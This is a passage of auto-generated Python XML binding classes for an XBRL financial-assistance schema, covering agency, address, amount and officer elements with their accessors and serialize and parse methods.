    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='streetAddressComplexType'):
        # Emit the id attribute at most once.
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='streetAddressComplexType', fromsubclass_=False, pretty_print=True):
        """Serialize each streetAddressLine child under the gen: namespace."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for streetAddressLine_ in self.streetAddressLine:
            streetAddressLine_.export(outfile, level, namespace_='gen:', name_='streetAddressLine', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an XML element node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Only the id attribute is recognized.
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Accumulate parsed streetAddressLine children."""
        if nodeName_ == 'streetAddressLine':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.streetAddressLine.append(obj_)
            obj_.original_tagname_ = 'streetAddressLine'
# end class streetAddressComplexType
class agencyComplexType(GeneratedsSuper):
    """Generated binding for the ``agencyComplexType`` element.

    Carries an agencyIdentifier, an agencyName, a list of agencyOffice
    children, and an optional XML ``id`` attribute.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, agencyIdentifier=None, agencyName=None, agencyOffice=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.agencyIdentifier = agencyIdentifier
        self.agencyName = agencyName
        # Fresh list per instance so a mutable default is never shared.
        self.agencyOffice = [] if agencyOffice is None else agencyOffice
    @staticmethod
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, generateDS-style.
        cls = agencyComplexType.subclass
        if cls is None:
            cls = agencyComplexType
        return cls(*args_, **kwargs_)
    def get_agencyIdentifier(self):
        return self.agencyIdentifier
    def set_agencyIdentifier(self, agencyIdentifier):
        self.agencyIdentifier = agencyIdentifier
    def get_agencyName(self):
        return self.agencyName
    def set_agencyName(self, agencyName):
        self.agencyName = agencyName
    def get_agencyOffice(self):
        return self.agencyOffice
    def set_agencyOffice(self, agencyOffice):
        self.agencyOffice = agencyOffice
    def add_agencyOffice(self, value):
        self.agencyOffice.append(value)
    def insert_agencyOffice_at(self, index, value):
        self.agencyOffice.insert(index, value)
    def replace_agencyOffice_at(self, index, value):
        self.agencyOffice[index] = value
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def hasContent_(self):
        # Non-empty when any child element is present.
        return bool(
            self.agencyIdentifier is not None
            or self.agencyName is not None
            or self.agencyOffice
        )
    def export(self, outfile, level, namespace_='finassist:', name_='agencyComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
        """Write this element and its children as XML to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='agencyComplexType')
        if not self.hasContent_():
            # Childless element: emit the self-closing form.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='agencyComplexType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='agencyComplexType'):
        # Emit the optional XML ``id`` attribute, at most once.
        if 'id' not in already_processed and self.id is not None:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='agencyComplexType', fromsubclass_=False, pretty_print=True):
        eol_ = '\n' if pretty_print else ''  # kept for parity with sibling exporters
        if self.agencyIdentifier is not None:
            self.agencyIdentifier.export(outfile, level, namespace_='gen:', name_='agencyIdentifier', pretty_print=pretty_print)
        if self.agencyName is not None:
            self.agencyName.export(outfile, level, namespace_='gen:', name_='agencyName', pretty_print=pretty_print)
        for office_ in self.agencyOffice:
            office_.export(outfile, level, namespace_='gen:', name_='agencyOffice', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an element-tree ``node``; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('id', node)
        if value is None or 'id' in already_processed:
            return
        already_processed.add('id')
        self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatch on tag name to the matching generated child type.
        if nodeName_ == 'agencyIdentifier':
            obj_ = integerItemType.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'agencyIdentifier'
            self.agencyIdentifier = obj_
        elif nodeName_ == 'agencyName':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'agencyName'
            self.agencyName = obj_
        elif nodeName_ == 'agencyOffice':
            obj_ = agencyOfficeComplexType.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'agencyOffice'
            self.agencyOffice.append(obj_)
# end class agencyComplexType
class agencyOfficeComplexType(GeneratedsSuper):
    """Generated binding for the ``agencyOfficeComplexType`` element.

    Holds an officeIdentifier/officeName pair plus an optional XML ``id``
    attribute.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, officeIdentifier=None, officeName=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.officeIdentifier = officeIdentifier
        self.officeName = officeName
    @staticmethod
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, generateDS-style.
        cls = agencyOfficeComplexType.subclass
        if cls is None:
            cls = agencyOfficeComplexType
        return cls(*args_, **kwargs_)
    def get_officeIdentifier(self):
        return self.officeIdentifier
    def set_officeIdentifier(self, officeIdentifier):
        self.officeIdentifier = officeIdentifier
    def get_officeName(self):
        return self.officeName
    def set_officeName(self, officeName):
        self.officeName = officeName
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def hasContent_(self):
        # Non-empty when either child element is present.
        return self.officeIdentifier is not None or self.officeName is not None
    def export(self, outfile, level, namespace_='finassist:', name_='agencyOfficeComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:gen="http://www.xbrl.org/int/gl/gen/2006-10-25" ', pretty_print=True):
        """Write this element and its children as XML to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='agencyOfficeComplexType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='agencyOfficeComplexType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='agencyOfficeComplexType'):
        # Emit the optional XML ``id`` attribute, at most once.
        if 'id' not in already_processed and self.id is not None:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='agencyOfficeComplexType', fromsubclass_=False, pretty_print=True):
        eol_ = '\n' if pretty_print else ''  # kept for parity with sibling exporters
        if self.officeIdentifier is not None:
            self.officeIdentifier.export(outfile, level, namespace_='gen:', name_='officeIdentifier', pretty_print=pretty_print)
        if self.officeName is not None:
            self.officeName.export(outfile, level, namespace_='gen:', name_='officeName', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an element-tree ``node``; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('id', node)
        if value is None or 'id' in already_processed:
            return
        already_processed.add('id')
        self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatch on tag name to the matching generated child type.
        if nodeName_ == 'officeIdentifier':
            obj_ = integerItemType.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'officeIdentifier'
            self.officeIdentifier = obj_
        elif nodeName_ == 'officeName':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            obj_.original_tagname_ = 'officeName'
            self.officeName = obj_
# end class agencyOfficeComplexType
class amountItemType(monetaryItemType):
    """Generated binding for the ``amountItemType`` element.

    Thin subclass of monetaryItemType: the element carries only text
    content (``valueOf_``) plus the attributes inherited from the base.
    """
    subclass = None
    superclass = monetaryItemType
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        super(amountItemType, self).__init__(unitRef, decimals, id, contextRef, precision, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    @staticmethod
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, generateDS-style.
        cls = amountItemType.subclass
        if cls is None:
            cls = amountItemType
        return cls(*args_, **kwargs_)
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Non-empty text, or any content contributed by the base class.
        return bool(self.valueOf_ or super(amountItemType, self).hasContent_())
    def export(self, outfile, level, namespace_='finassist:', name_='amountItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element (attributes, text content, children) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='amountItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        # NOTE(review): .encode() yields bytes, matching the generated
        # py2-style writer used throughout this module.
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='amountItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='amountItemType'):
        # All attributes come from the monetary base type.
        super(amountItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='amountItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='amountItemType', fromsubclass_=False, pretty_print=True):
        # No child elements of its own; delegate to the base class.
        super(amountItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an element-tree ``node``; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(amountItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content: nothing to do for child nodes.
        pass
# end class amountItemType
class congressionalDistrictItemType(tokenItemType):
    """Generated binding for the ``congressionalDistrictItemType`` element.

    Thin subclass of tokenItemType: the element carries only text content
    (``valueOf_``) plus the attributes inherited from the base.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        super(congressionalDistrictItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    @staticmethod
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, generateDS-style.
        cls = congressionalDistrictItemType.subclass
        if cls is None:
            cls = congressionalDistrictItemType
        return cls(*args_, **kwargs_)
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Non-empty text, or any content contributed by the base class.
        return bool(self.valueOf_ or super(congressionalDistrictItemType, self).hasContent_())
    def export(self, outfile, level, namespace_='finassist:', name_='congressionalDistrictItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element (attributes, text content, children) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='congressionalDistrictItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='congressionalDistrictItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='congressionalDistrictItemType'):
        # All attributes come from the token base type.
        super(congressionalDistrictItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='congressionalDistrictItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='congressionalDistrictItemType', fromsubclass_=False, pretty_print=True):
        # No child elements of its own; delegate to the base class.
        super(congressionalDistrictItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an element-tree ``node``; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(congressionalDistrictItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content: nothing to do for child nodes.
        pass
# end class congressionalDistrictItemType
class stateItemType(tokenItemType):
    """Generated binding for the ``stateItemType`` element.

    Thin subclass of tokenItemType: the element carries only text content
    (``valueOf_``) plus the attributes inherited from the base.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        super(stateItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    @staticmethod
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, generateDS-style.
        cls = stateItemType.subclass
        if cls is None:
            cls = stateItemType
        return cls(*args_, **kwargs_)
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Non-empty text, or any content contributed by the base class.
        return bool(self.valueOf_ or super(stateItemType, self).hasContent_())
    def export(self, outfile, level, namespace_='finassist:', name_='stateItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element (attributes, text content, children) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='stateItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='stateItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='stateItemType'):
        # All attributes come from the token base type.
        super(stateItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='stateItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='stateItemType', fromsubclass_=False, pretty_print=True):
        # No child elements of its own; delegate to the base class.
        super(stateItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an element-tree ``node``; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(stateItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content: nothing to do for child nodes.
        pass
# end class stateItemType
class businessTypeItemType(tokenItemType):
    """Generated binding for the ``businessTypeItemType`` element.

    Thin subclass of tokenItemType: the element carries only text content
    (``valueOf_``) plus the attributes inherited from the base.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        super(businessTypeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    @staticmethod
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, generateDS-style.
        cls = businessTypeItemType.subclass
        if cls is None:
            cls = businessTypeItemType
        return cls(*args_, **kwargs_)
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Non-empty text, or any content contributed by the base class.
        return bool(self.valueOf_ or super(businessTypeItemType, self).hasContent_())
    def export(self, outfile, level, namespace_='finassist:', name_='businessTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element (attributes, text content, children) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='businessTypeItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='businessTypeItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='businessTypeItemType'):
        # All attributes come from the token base type.
        super(businessTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='businessTypeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='businessTypeItemType', fromsubclass_=False, pretty_print=True):
        # No child elements of its own; delegate to the base class.
        super(businessTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an element-tree ``node``; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(businessTypeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content: nothing to do for child nodes.
        pass
# end class businessTypeItemType
class recordTypeItemType(tokenItemType):
    """Generated binding for the ``recordTypeItemType`` element.

    Thin subclass of tokenItemType: the element carries only text content
    (``valueOf_``) plus the attributes inherited from the base.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        super(recordTypeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    @staticmethod
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, generateDS-style.
        cls = recordTypeItemType.subclass
        if cls is None:
            cls = recordTypeItemType
        return cls(*args_, **kwargs_)
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Non-empty text, or any content contributed by the base class.
        return bool(self.valueOf_ or super(recordTypeItemType, self).hasContent_())
    def export(self, outfile, level, namespace_='finassist:', name_='recordTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element (attributes, text content, children) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='recordTypeItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='recordTypeItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='recordTypeItemType'):
        # All attributes come from the token base type.
        super(recordTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='recordTypeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='recordTypeItemType', fromsubclass_=False, pretty_print=True):
        # No child elements of its own; delegate to the base class.
        super(recordTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an element-tree ``node``; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(recordTypeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content: nothing to do for child nodes.
        pass
# end class recordTypeItemType
class typeOfActionItemType(tokenItemType):
    """Generated binding for the ``typeOfActionItemType`` element.

    Thin subclass of tokenItemType: the element carries only text content
    (``valueOf_``) plus the attributes inherited from the base.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        super(typeOfActionItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    @staticmethod
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, generateDS-style.
        cls = typeOfActionItemType.subclass
        if cls is None:
            cls = typeOfActionItemType
        return cls(*args_, **kwargs_)
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Non-empty text, or any content contributed by the base class.
        return bool(self.valueOf_ or super(typeOfActionItemType, self).hasContent_())
    def export(self, outfile, level, namespace_='finassist:', name_='typeOfActionItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element (attributes, text content, children) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='typeOfActionItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='typeOfActionItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='typeOfActionItemType'):
        # All attributes come from the token base type.
        super(typeOfActionItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='typeOfActionItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='typeOfActionItemType', fromsubclass_=False, pretty_print=True):
        # No child elements of its own; delegate to the base class.
        super(typeOfActionItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an element-tree ``node``; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(typeOfActionItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content: nothing to do for child nodes.
        pass
# end class typeOfActionItemType
class typeOfTransactionCodeItemType(tokenItemType):
    """Generated binding for the ``typeOfTransactionCodeItemType`` element.

    Thin subclass of tokenItemType: the element carries only text content
    (``valueOf_``) plus the attributes inherited from the base.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        super(typeOfTransactionCodeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    @staticmethod
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, generateDS-style.
        cls = typeOfTransactionCodeItemType.subclass
        if cls is None:
            cls = typeOfTransactionCodeItemType
        return cls(*args_, **kwargs_)
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Non-empty text, or any content contributed by the base class.
        return bool(self.valueOf_ or super(typeOfTransactionCodeItemType, self).hasContent_())
    def export(self, outfile, level, namespace_='finassist:', name_='typeOfTransactionCodeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element (attributes, text content, children) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='typeOfTransactionCodeItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='typeOfTransactionCodeItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='typeOfTransactionCodeItemType'):
        # All attributes come from the token base type.
        super(typeOfTransactionCodeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='typeOfTransactionCodeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='typeOfTransactionCodeItemType', fromsubclass_=False, pretty_print=True):
        # No child elements of its own; delegate to the base class.
        super(typeOfTransactionCodeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an element-tree ``node``; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(typeOfTransactionCodeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content: nothing to do for child nodes.
        pass
# end class typeOfTransactionCodeItemType
class highlyCompensatedOfficerComplexType(GeneratedsSuper):
    """Generated binding for the ``highlyCompensatedOfficerComplexType`` element.

    Holds an officer's first name, middle initial, last name, and
    compensation children, plus an optional XML ``id`` attribute.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, highlyCompensatedOfficerFirstName=None, highlyCompensatedOfficerMiddleInitial=None, highlyCompensatedOfficerLastName=None, highlyCompensatedOfficerCompensation=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.highlyCompensatedOfficerFirstName = highlyCompensatedOfficerFirstName
        self.highlyCompensatedOfficerMiddleInitial = highlyCompensatedOfficerMiddleInitial
        self.highlyCompensatedOfficerLastName = highlyCompensatedOfficerLastName
        self.highlyCompensatedOfficerCompensation = highlyCompensatedOfficerCompensation
    @staticmethod
    def factory(*args_, **kwargs_):
        # Honour a registered subclass override, generateDS-style.
        cls = highlyCompensatedOfficerComplexType.subclass
        if cls is None:
            cls = highlyCompensatedOfficerComplexType
        return cls(*args_, **kwargs_)
    def get_highlyCompensatedOfficerFirstName(self):
        return self.highlyCompensatedOfficerFirstName
    def set_highlyCompensatedOfficerFirstName(self, highlyCompensatedOfficerFirstName):
